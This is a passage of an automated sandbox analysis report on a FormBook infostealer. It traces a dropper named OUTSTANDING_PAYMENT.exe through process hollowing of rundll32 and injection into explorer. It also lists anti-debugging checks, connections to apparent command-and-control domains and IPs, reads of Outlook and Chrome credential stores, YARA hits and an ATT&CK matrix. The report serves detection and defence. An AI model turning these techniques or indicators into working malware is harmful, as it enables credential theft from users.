          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01295210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0134B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01324257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01368D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0131A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01313540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01343D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01292D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01348DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01351C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01316C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0132C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040CF43 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C55BF4 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C55BF4 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C59D4C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C5450E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 109.70.26.37 80
          Source: C:\Windows\explorer.exeNetwork Connect: 88.99.217.197 80
          Source: C:\Windows\explorer.exeDomain query: www.themssterofssuepnse.rest
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.249 80
          Source: C:\Windows\explorer.exeNetwork Connect: 162.209.159.142 80
          Source: C:\Windows\explorer.exeDomain query: www.karlscurry.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 192.64.116.162 80
          Source: C:\Windows\explorer.exeDomain query: www.fanversewallet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.181.216.141 80
          Source: C:\Windows\explorer.exeDomain query: www.allison2patrick.online
          Source: C:\Windows\explorer.exeNetwork Connect: 62.4.21.190 80
          Source: C:\Windows\explorer.exeDomain query: www.virginhairweave.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.ty23vip.com
          Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80
          Source: C:\Windows\explorer.exeDomain query: www.thelastwill.net
          Source: C:\Windows\explorer.exeDomain query: www.gorwly.top
          Source: C:\Windows\explorer.exeDomain query: www.hudsonandbailey.uk
          Source: C:\Windows\explorer.exeDomain query: www.g2fm.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.landlotto.ru
          Source: C:\Windows\explorer.exeDomain query: www.glb-mobility.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80
          Source: C:\Windows\explorer.exeDomain query: www.ketoibabal.cyou
          Source: C:\Windows\explorer.exeDomain query: www.mynichemarket.co.uk
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.30.181 80
          Source: C:\Windows\explorer.exeDomain query: www.brennmansoluciones.com
          Source: C:\Windows\explorer.exeDomain query: www.dirdikyepedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 203.245.24.47 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: E30000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\qhcqh.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeThread register set: target process: 3452
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3452
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.785129007.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475538694.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.777751246.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.266462070.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000002.778998119.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267348908.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56278 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS141
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
